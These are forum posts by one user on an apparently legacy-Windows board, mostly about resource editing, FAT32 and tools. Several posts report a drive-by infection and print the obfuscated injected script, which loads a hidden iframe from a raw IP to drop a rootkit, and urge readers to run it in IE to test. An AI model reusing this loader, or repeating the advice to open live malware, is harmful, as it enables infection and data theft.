eidenk

I agree and I would personally be even more grateful if Anonymous could some day remember the extra setting, he talked about some time ago, which allows to set a custom size for 32bit resources.

I bump it because that javascript exploit is very serious stuff IMO and most certainly affects all fully patched 9x systems. Can someone confirm that a 98SE or ME system with a fully patched IE 6 (SP1 + Maximum Decim Update) is vulnerable to that exploit ?

Ok so, here is a version with 256 color bitmaps. I have edited the opened and closed folders to make them look like those in windows Explorer as an example : Winfile+

Thanks erpdude but let's try to clarify : IE does not crash here but a file called vm3.exe is downloaded from a website in Russia and then executed on my machine simply by accesing the Alchemylab.com web site or just by running a local html page in which the above snippet of javascript is included. Copying/pasting this snippet into notepad, saving as html and then opening it with IE does the same job. Vm3.exe gets downloaded and executed but as it is not compatible with 9x OSes, it crashes itself immediately (IE is not affected) instead of hiding itself and send personal data somewhere on the web as it is supposed to do on an NT OS. According to peeps on the sysinternals forum on which I also posted that stuff, vm3.exe is a data stealer rootkit, meaning that as soon as it is downloaded and executed on a an NT OS, it hides itself from both the file manager and the process manager and attempts to steal personal data from you. Vm3.exe is actually quite irrelevant to my post. What I am interested in is the javascript exploit that allows this file to be downloaded and executed on my machine without any other interaction than running a web page on which there is this piece of script. Obviously this script in a modified form would be able to download and execute anything on my machine and possibly screw my system totally by a plethora of possible means. Code exists to erase BIOSes from within windows, damage hardware or totally screw the file system. Any such scenario and others are possible through this javascript exploit. It is not clear in your post whether this vm3.exe gets downloaded and executed or not on your XP machine with jscript.dll 5.7.0.5730. Bear in mind that, as it is a rootkit, you will not notice it is there (if it is there) through normal means. It is not clear either whether you actually tried Win98/ME + IE6 + jscript.dll 5.7.0.5730 on that page or just infer what you say from your test with XPSP2 + IE7. No it's not faulty, it is infected with an exploit that at least affects 9x OSes + IE5.5 + JSCRIPT.DLL 5.6.0.8831 and very possibly NT systems also as vm3.exe seems to be targeted exclusively at those systems. Please could someone post this jscript.dll 5.7.0.5730 so that it can be tried here.

How is this a problem? I haven't had a virus in years, because I'm not a luser that clicks "Yes" on every download/warning prompt. Also, viruses target newer Windows systems, and services that only exist on those. The only door in Win9x is the browser, and if that door is secured, you're safe. A hardware firewall gives even better protection. Actually there is no need to click yes on anything in order to get infected. Accessing a webpage with certain scripts on them is enough. If you save as html file the snippet I have posted in the first post of this topic and run the page with IE, a file named vm3.exe should be downloaded in your temp folder from a website in Russia without any interaction from your part. (You need to have javascript enabled in IE of course) You can try safely as this vm3.exe which is a rootkit targetting NT OSes and attempts to run as soon as it is downloaded, appears to crash immediately on a 9x OS.

A well maintained system.

Those files get opened as hexadecimal data so yes but not any easier than with an hex editor.

Thanks dude, I hadn't followed up the latest devellopements of the service packs lately, but as I saw that this file was now included in most of them I tried it. I have just read kb919237 about JSCRIPT.DLL 5.6.0.8832. Unfortunately it does not seem to address any security issue over 5.6.0.8831, only a slow performance issue on some page with IE6, and the above script is able to download a file from a website and execute it on my machine with 5.6.0.8831. In the last six months or so I caught Gromozon/Link Optimizer, Bagle, Haxdoor, lsasss, PurityScan, CnsMin and now this one. All through IE and possibly all through the same flaw in jscript.dll. Has someone got JSCRIPT.DLL 5.6.0.8832 so that I could try it even though I am pretty sure it won't fix the hole. It should be in MESP Beta6 but I don't have it and the download link is dead.

No problems. I have adopted your winfile as well. You've done marvels within the 16 color limitation of bitmaps btw. I could upload another one if you want in which the bitmaps are converted to 256 colors in case you'd want to further enhance them.

OK so I had jscript.dll 5.6.0.8831 and this script dropped a vm3.exe from 81.95.146.98 in my temp folder which fortunately crashed immediately : <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <!-- saved from url=(0026)http://www.alchemylab.com/ --> <script language=javascript> document.write( unescape( '%3C%69%66%72%61%6D%65%20%73%72%63%3D%20%68%74%74%70%3A%2F%2F%38%31%2E%39%35%2E%31%34%36%2E%39%38%2F%69%6E%64%65%78%2E%68%74%6D%6C%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%22%30%22%20%77%69%64%74%68%3D%22%31%22%20%68%65%69%67%68%74%3D%22%31%22%20%73%63%72%6F%6C%6C%69%6E%67%3D%22%6E%6F%22%20%6E%61%6D%65%3D%63%6F%75%6E%74%65%72%3E%3C%2F%69%66%72%61%6D%65%3E' ) ); </SCRIPT> I did update to jscript.dll 5.6.0.8833 which fixed the above problem but unfortunately it breaks stuff, namely I can't post correctly in boards anymore with it. On some boards, the edit field does not display at all anymore and here it displays the edit field but none of the formatting stuff at all. This happens with IE 5.5SP2 KB905915 on WinME. Any ideas ? Am I missing something in addition to jscript.dll 5.6.0.8833 so that I can post correctly in boards with it ? Does the problem exist with IE6 as well ?

I guess you haven't properly read what I wrote. I have never said that a 32MB file from a CD would occupy 1GB on HDD.

Data on CD is stored contiguously, ie, without empty gaps. Fill a 700MB CD with 1kb files. Then copy that to HDD with a cluster size of 32kb and see how much disk space it occupies. 32 x 700MB or 22GB but in fact there will only be 700MB of data. All the rest is lost. This issue has nothing to see with overburning IMO or mode 2 CD or whatever of that sort but everything with the fact that there cannot be 2 files on the same cluster on HDD (at least on FAT32 dunno for NTFS). On CDs no space is lost, on HDD the space occupied by a file will be a multiple of the cluster size. If a file is the size of one cluster + 1 bit, it will occupy two clusters. Correct me if I am wrong.

I haven't been on the forums lately so I have not witnessed any of the events that led to her ban, but I am not surprised she has been I must say. Certainly she has been an extremely valuable contributor to this forum (and I am the first to be admirative and grateful for the esdi_506.pdr fix she has done), but this does not allow someone to then, say, use the PM system to distribute links to illegal iso downloads for example, as she was doing, or trying to, two months ago, along with a moot argument that because MS does not sell an OS anymore, she is allowed to do whatever she wants with it on here. At that time I warned her and also spoke the voice of wisdom but she dismissed it all, saying I was not a moderator or something like that. Then xper closed the thread after a few more posts if I recall correctly. I am pretty sure that posts such as those she did at the time, would have led to an immediate ban if she had been a new poster. What has she done exactly to get banned then ? Has anyone round here witnessed it directly ?

I am not sure VC++ 2005 will even do the job under XP as *I think* support for editing 16bit executables has been dropped from versions above 6. I am using VC++ 6 Standard Edition, which I bought on eBay for very cheap (£12 including P&P). VC++ 5 will do the same job but cannot be installed correctly on my ME OS (wants IE 4 to be installed), which does not matter for editing resources in executables as copying the folder containing the IDE over is enough. VC++ 4, and probably even earlier versions, will do but not so well as 5 and 6. Oddly enough it is not possible to edit 32 bit executables with those IDEs under 9x OSes. You need to use VC++ under an NT OS to be able to do that.

Done. It's here : Winfile There is not much need for expertise for doing that btw. As easy as using Reshacker or eXescope.

OK so, I have downloaded eXescope from Softpedia (version 6.41) and I have been unable to replace the icons of winfile.exe with others of a different color depth. I have been able to replace a 16 color bitmap with a 256 color one but then the modified winfile crashes systematically on launch. With VC++, I can do both of those things and the exe runs normally.

No CreateMD5SSOHash function in Wininet.dll here. I am on WinME and I don't have MSN Messenger installed but at least it is an answer. I have looked again and I have found many RandSeed entries in my registry, 2 in HKLM and more than 20 in HKCU. All having to do with encryption apparently.

Have you actually tried to replace bitmap or icon resources in NE executables with it ?

Maybe you'll find yet more tweaks in there :

The wikipedia page is interesting : File Allocation Table on Wikipedia Another interesting page : Fat 32 Formatter

It's free and it can edit physical drives under 9x, meaning you can edit/backup/mess with the boot sector, partition tables, etc.. with it. Plenty of other advanced features as well but this is the most immediately interesting one. HxD Homepage

Ok, it is very easy to change resources in 16bit files if you have Visual C++. Here is one example : Sysedit with 256 color icons If you don't have VC++ and would like to change bitmap or icon resources in other 16bit files, provide the new resources and I'll do it for you.

Have you tried KaiEdit ? It has line numbering, GoTo, S&R, favorites, tabbed multiple documents interface, opens big files (even binaries), syntax highlighting, and a quite unique and very usefull vertical selection mode. It's only in German though and it lacks wordwrap unfortunately.

The sysinternals utils for legacy systems are and will remain available from MS/Sysinternals : http://www.microsoft.com/technet/sysintern...ssExplorer.mspx http://www.microsoft.com/technet/sysintern...ies/Regmon.mspx http://www.microsoft.com/technet/sysintern...es/filemon.mspx

Zoom Player - Support & Development Latest development information, suggest new features, troubleshoot problems and report bugs http://forum.inmatrix.com/index.php?showforum=2